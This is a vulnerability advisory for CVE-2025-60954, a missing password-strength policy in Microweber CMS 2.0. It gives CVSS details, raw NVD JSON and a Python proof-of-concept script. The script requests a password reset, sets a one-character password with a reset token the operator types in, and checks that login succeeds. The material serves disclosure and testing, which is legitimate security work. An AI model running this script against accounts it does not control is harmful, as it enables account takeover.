Security Vulnerability Report
CVE-2025-60954 CVSS 8.3 HIGH

CVE-2025-60954

Published: 2025-10-24 21:16:04
Last Modified: 2025-10-28 14:22:53

Description

Microweber CMS 2.0 has Weak Password Requirements. The application does not enforce minimum password length or complexity during password resets. Users can set extremely weak passwords, including single-character passwords, which can lead to account compromise, including administrative accounts.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:microweber:microweber:2.0.0:*:*:*:*:*:*:* - VULNERABLE
Microweber CMS 2.0 (the CPE match above covers version 2.0.0 only; other releases are not assessed in this record)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it does not bypass the password-reset token: step 2 requires a valid reset token taken from the target account's mailbox, so the PoC demonstrates the missing server-side password policy (a trivially weak password is accepted), not an unauthenticated account takeover.
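#!/usr/bin/env python3
"""
CVE-2025-60954 PoC - Microweber CMS 2.0 Weak Password Requirements

This PoC demonstrates the weak password validation vulnerability in
Microweber CMS 2.0: the password-reset flow accepts a new password of any
length/complexity (e.g. a single character) and the account can then be
logged into with it.

Usage:
    poc.py [TARGET_URL] [VICTIM_EMAIL]

Caveats for the operator:
  * Step 2 needs a valid reset token, typed in from the reset e-mail sent to
    VICTIM_EMAIL. The script does not guess or bypass that token; it only
    shows that the server accepts a trivially weak password once a valid
    token is presented, so run it against accounts whose mailbox you control.
  * The API paths are the ones published with the original PoC; confirm them
    against the target's API before trusting a "failed" result.
  * Prefer an https:// target: over plain http the reset token and the new
    password travel in clear text.
"""
import requests
import json
import sys

TARGET_URL = "http://target-site.com"
VICTIM_EMAIL = "[email protected]"
# Seconds to wait for each HTTP request before giving up.
REQUEST_TIMEOUT = 10


def _decode_json(response):
    """Return the decoded JSON body of *response*, or None if it is not JSON.

    ``response.json()`` raises ValueError (JSONDecodeError is a subclass) on a
    non-JSON body - e.g. an HTML error page - which the original PoC let
    propagate as a traceback.
    """
    try:
        return response.json()
    except ValueError:
        print(f"[-] Non-JSON response body (HTTP {response.status_code})")
        return None


def request_password_reset(url, email):
    """Step 1: Request password reset for target account.

    Returns the decoded JSON reply when the server answered with a non-error
    status (``response.ok``), otherwise None.
    """
    reset_endpoint = f"{url}/api/user/password_reset"
    data = {"email": email}
    try:
        response = requests.post(reset_endpoint, json=data, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        print(f"[-] Error requesting password reset: {e}")
        return None
    if not response.ok:
        print(f"[-] Password reset request failed: {response.status_code}")
        return None
    return _decode_json(response)


def reset_password_with_weak_pwd(url, reset_token, weak_password="a"):
    """Step 2: Reset password with weak password (e.g., single character).

    Returns True when the server answered with a non-error status
    (``response.ok``), False on an HTTP error status or a transport failure.
    Only the status is checked here; step 3 (login) is the real confirmation.
    """
    reset_endpoint = f"{url}/api/user/password_reset/confirm"
    data = {
        "token": reset_token,
        "password": weak_password,
        "password_confirmation": weak_password,
    }
    try:
        response = requests.post(reset_endpoint, json=data, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        print(f"[-] Error resetting password: {e}")
        return False
    if not response.ok:
        print(f"[-] Password reset failed: {response.status_code}")
        return False
    print(f"[+] Password successfully reset to: '{weak_password}'")
    print("[!] This demonstrates the weak password validation vulnerability")
    return True


def verify_weak_password_login(url, email, weak_password):
    """Step 3: Verify login with weak password works.

    Success means a non-error HTTP status AND a JSON object containing a
    ``token`` key; anything else (error status, non-JSON body, JSON that is
    not an object) is reported as failure instead of raising.
    """
    login_endpoint = f"{url}/api/user/login"
    data = {"email": email, "password": weak_password}
    try:
        response = requests.post(login_endpoint, json=data, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        print(f"[-] Error during login verification: {e}")
        return False
    if not response.ok:
        print(f"[-] Login failed: {response.status_code}")
        return False
    body = _decode_json(response)
    # `"token" in body` on a str/list body would be a substring/element test,
    # not a key lookup, so require a JSON object explicitly.
    if isinstance(body, dict) and "token" in body:
        print(f"[+] Login successful with weak password: '{weak_password}'")
        print("[!] Account compromised!")
        return True
    print("[-] Login reply did not contain a session token")
    return False


def main():
    """Drive the three steps interactively; return a process exit code (0 = PoC confirmed)."""
    print("=" * 60)
    print("CVE-2025-60954 PoC - Microweber CMS 2.0")
    print("Weak Password Requirements Vulnerability")
    print("=" * 60)
    # Optional positional overrides; the old single-argument form still works.
    url = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    url = url.rstrip("/")  # avoid "//api/..." when a trailing slash is passed
    victim_email = sys.argv[2] if len(sys.argv) > 2 else VICTIM_EMAIL
    print(f"\n[*] Target: {url}")
    print(f"[*] Victim email: {victim_email}")
    if url.lower().startswith("http://"):
        print("[!] Warning: plain-http target - the reset token and new password will be sent in clear text")

    print("\n[*] Step 1: Requesting password reset...")
    reset_result = request_password_reset(url, victim_email)
    if not reset_result:
        print("[-] Password reset request was not acknowledged; stopping")
        return 1
    print("[+] Password reset email sent")

    reset_token = input("\n[?] Enter password reset token (from email): ").strip()
    if not reset_token:
        print("[-] No reset token supplied; stopping")
        return 1
    weak_password = input("[?] Enter weak password to use (default: 'a'): ") or "a"

    print("\n[*] Step 2: Resetting password with weak password...")
    if not reset_password_with_weak_pwd(url, reset_token, weak_password):
        return 1

    print("\n[*] Step 3: Verifying login with weak password...")
    return 0 if verify_weak_password_login(url, victim_email, weak_password) else 1


if __name__ == "__main__":
    sys.exit(main())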

References (see the `references` array in the raw JSON below: the reporter's GitHub gist and CVE-Reports entry, both tagged Exploit / Third Party Advisory, and the Microweber product repository)

Raw JSON Data

{"cve": {"id": "CVE-2025-60954", "sourceIdentifier": "[email protected]", "published": "2025-10-24T21:16:03.917", "lastModified": "2025-10-28T14:22:52.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microweber CMS 2.0 has Weak Password Requirements. The application does not enforce minimum password length or complexity during password resets. Users can set extremely weak passwords, including single-character passwords, which can lead to account compromise, including administrative accounts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-521"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microweber:microweber:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D1F2EB73-6775-4681-BFED-D7D759214A11"}]}]}], "references": [{"url": "https://gist.github.com/progprnv/feae2b76f2db0cb2ac6e14b1bf7d8646", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/microweber/microweber", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-60954", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}